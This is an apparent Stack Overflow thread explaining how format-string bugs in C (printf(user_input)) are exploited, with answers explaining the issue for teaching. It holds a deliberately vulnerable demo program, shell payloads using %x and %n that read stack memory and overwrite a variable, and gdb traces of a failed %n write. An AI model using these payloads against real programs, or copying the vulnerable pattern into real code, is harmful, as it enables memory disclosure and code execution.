
I was reading about vulnerabilities in code and came across this Format-String Vulnerability.

Wikipedia says:

Format string bugs most commonly appear when a programmer wishes to print a string containing user supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended.

I understand the problem with the printf(buffer) version, but I still don't see how an attacker can use this vulnerability to execute harmful code. Can someone show, with an example, how this vulnerability can be exploited?

  • For reference, the buffer overflow attack question is here: stackoverflow.com/questions/7344226/buffer-overflow-attack Commented Sep 18, 2011 at 5:31
  • possibly related: stackoverflow.com/questions/5672996/… Commented Sep 18, 2011 at 5:33
  • @Mehrdad: Why should printf pop anything off the stack? It's not like it knows (or cares) how many arguments (or even how big) were originally pushed... Commented Sep 18, 2011 at 5:33
  • @Mehrdad: It doesn't pop anything off the stack, though. It just reads them. Take note that the caller might have even pushed more arguments than the callee expects, and yet the caller does the cleanup. The callee doesn't know or care -- all it does is read the data. That's why you can't have callee-cleanup with varargs in C. Commented Sep 18, 2011 at 5:35
  • @Mehrdad Now you've got me thinking... seems you're right. It definitely reads more data from stack, but that doesn't necessarily imply popping as it reads. Commented Sep 18, 2011 at 5:37

6 Answers 6

98

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):

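#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable demo: do not use this pattern in real code. */
int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text); /* the bug: user input is used as the format string */

    /* %08x with a pointer assumes a 32-bit target, as in the output below */
    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}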

The basis of this vulnerability is the behaviour of functions with variable arguments. A function that handles a variable number of parameters essentially has to read them from the stack, and it only knows how many to read from what the format string tells it. If we specify a format string that makes printf() expect two integers on the stack but provide only one parameter, the second one will be whatever else happens to be on the stack. By extension, if we have control over the format string, we get the two most fundamental primitives:


Reading from arbitrary memory addresses

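[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyway.

It's possible to use the %s format specifier to read data from an address of your choosing, but first you need to find where your own input sits on the stack. A run of %x specifiers prints successive words from where printf() expects its arguments. Because text itself lives on the stack, you eventually reach the bytes of the original format string in printf(text); here the fourth %08x prints 41414141, which is the "AAAA" at the start of the input. Replacing that final %08x with %s would make printf() treat those bytes as an address and print the string stored there: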

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAAXXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field widths that make wrap-around possible, building your own primitives), and this is just the tip of the iceberg. I would suggest reading more articles on format string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.


Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.


2 Comments

Hi, I'm wondering how $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n works? Why is "??" printed out for the whole lot in front? How did it reach the memory address 0x08049794? Thanks a lot
The ?? is printed because $(printf "\x94\x97\x04\x08") will try to convert these values into characters. Because these values are not printable characters, your terminal will print a ? instead. (Try printf "\x41\x42\x43\x44", which will print ABCD because these are valid ASCII values.)
21

It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:

"%200$p"

to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).

However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.


* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.

1 Comment

Thanks for mentioning! I've been looking for an explanation.
9

Ah, the answer is in the article!

Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.

A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.

This is because %n causes printf to write data through a pointer that it reads from its argument list, which is on the stack. If the attacker controls that pointer, printf can be made to write to an arbitrary location. All you need is for the program to later use the overwritten value (this is relatively easy if it happens to be a function pointer, whose value you just figured out how to control), and the attacker can make it execute arbitrary code.

Take a look at the links in the article; they look interesting.


2

A little theory

If you want to see the actual trick for writing to a custom address, jump to the second part.

Let's try tweaking the format string in the printf() trick.

printf("ABABABAB");

But encoding a hex address directly into a format string did not work. The whole point is to place an address we want to attack on the stack, disguised as data, but my format string "ABABABAB" ended up in the .rodata section and not on the stack as we wanted.

Breakpoint 1, __printf (format=0x555555556004 "ABABABAB") at ./stdio-common/printf.c:28
(gdb) i args
format = 0x555555556004 "ABABABAB"

Looking this address up in the process memory map shows it is probably in the .rodata section:

      Start Addr           End Addr       Size     Offset  Perms  objfile
  0x555555554000     0x555555555000     0x1000        0x0  r--p   /home/drazen/proba/main
  0x555555555000     0x555555556000     0x1000     0x1000  r-xp   /home/drazen/proba/main
  0x555555556000     0x555555557000     0x1000     0x2000  r--p   /home/drazen/proba/main
  0x555555557000     0x555555558000     0x1000     0x2000  r--p   /home/drazen/proba/main
  0x555555558000     0x555555559000     0x1000     0x3000  rw-p   /home/drazen/proba/main

We can check this with readelf:

drazen@HP-ProBook-640G1:~/proba$ readelf  -p .rodata  main 
String dump of section '.rodata':
  [     4]  ABABABAB

So far so good, but the weird part came when I dumped the stack, expecting to find the address of the ABABABAB string in the stack frame as the argument passed to printf().

(gdb) i frame
Stack level 0, frame at 0x7fffffffddf0:
rip = 0x7ffff7de16f0 in __printf (./stdio-common/printf.c:28); saved rip = 0x555555555165
called by frame at 0x7fffffffde00
source language c.
Arglist at 0x7fffffffdde0, args: format=0x555555556004 "ABABABAB"

You can see the return address to main(), 0x555555555165, and would expect to find the format string address on the stack at address 0x7fffffffdde0. But when we dump the stack, instead of the format string address there are just 8 bytes of zeros where the function argument should be, between the return address of the __libc_start_call_main() stack frame and the return address of the printf() stack frame:

(gdb) x/32gx $sp
0x7fffffffdde0: 0x0000000000000000  0x0000555555555165
0x7fffffffddf0: 0x0000000000000001  0x00007ffff7daad90
0x7fffffffde00: 0x0000000000000000  0x0000555555555149
0x7fffffffde10: 0x0000000100000000  0x00007fffffffdf08

So how is the address of the format string passed to printf()? When we dumped the registers, we saw the format string address in the rsi register.

(gdb) i r
rax            0x7ffff7f9b868      140737353726056
rbx            0x0                 0
rcx            0x0                 0
rdx            0x7fffffffdcf0      140737488346352
rsi            0x555555556004      93824992239624
rdi            0x7ffff7f9b780      140737353725824

Because on x86-64 Linux the first function arguments (the string address in this case) are passed in registers such as rdi and rsi, for speed, and not on the stack, we can't use the format string pointer or string arguments for this trick.

So we can only use strings created as local (automatic) variables, which are placed on the stack before the return address in the current stack frame.


Actual example

Anyway, I tried this small example and it worked: it printed out the addresses placed in local strings (created on the stack). So we could use this trick to make local strings mimic the addresses we want to access:

Sample code

We have to print 5 unrelated values before we reach what we wanted, our local strings!

Using the hexadecimal format %x showed the hex representation of the strings avro, nana, loli on the stack (using the %s string format would cause a segmentation fault, because printf() would interpret those values as addresses of strings, but those "addresses" are probably not in a mapped area of the process or are in a protected memory area):

Output

So now we have used local variables on the stack to "masquerade" as addresses for a read. But what if we use the same trick to try to write to that address?

Let's change the last %X format specifier to %n. Instead of printing the data on the stack with %X, printf() will use this data as the address of a variable in which to store the number of characters already printed. So the idea is to gain write access to a custom address.

printf("ABABABAB\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%016llX\n,%n");

Our FAKE address 0x61616161616161, the ASCII string "aaaaaaa", ends up in the %rax register, and printf() will write the number of characters already printed (stored in r12) to this address:

(gdb) i r
rax            0x61616161616161    27410143614427489
rbx            0x555555556052      93824992239698


      0x00007ffff7df7c3c <+7180>:   jne    0x7ffff7df8276 <__vfprintf_internal+8774>
   => 0x00007ffff7df7c42 <+7186>:   mov    %r12d,(%rax)

But in our case this causes a segmentation fault (SIGSEGV), since address 0x61616161616161 is not mapped into the process memory.

Continuing.
ABABABAB
,00007FFFFFFFDF08
,00007FFFFFFFDF18
,0000555555557DB8
,00007FFFF7F9BF10
,00007FFFF7FC9040
,0031313131313131
,0032323232323232
Program received signal SIGSEGV, Segmentation fault.


1

I would recommend reading this lecture note about format string vulnerability. It describes in details what happens and how, and has some images that might help you to understand the topic.


0

AFAIK it's mainly because it can crash your program, which is considered a denial-of-service (DoS) attack. All you need is to make printf() dereference an invalid address (a format string with a few %s specifiers will almost always do it), and you have a simple DoS attack.

Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.

But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?

The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.


Update:

See this link for the CSRSS bug I was referring to.


Edit:

Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.

8 Comments

Thanks Mehrdad, I think crashing a program would still be generally easier than being able to run your own code. So, specifically I'm looking for an answer to execution of attacker's code. But still I must upvote for a good answer :)
@Atul: Haha thanks. :) Yeah, if anyone can come up with an actual arbitrary code execution example then I'd DEFINITELY want to see it!
@Atul: I posted another answer, from the article itself. If I manage to write the code then I'll do that, too -- but that one is a direct attack of the kind you're looking for.
This answer is nonsense. You should delete it in light of your correct answer.
The OP wanted to know how printf can be exploited to execute harmful code. You wrote about a DoS attack. That may be an exploit, but it doesn't explain how to execute harmful code. The CSRSS doesn't use printf, so it doesn't answer the OP's question either.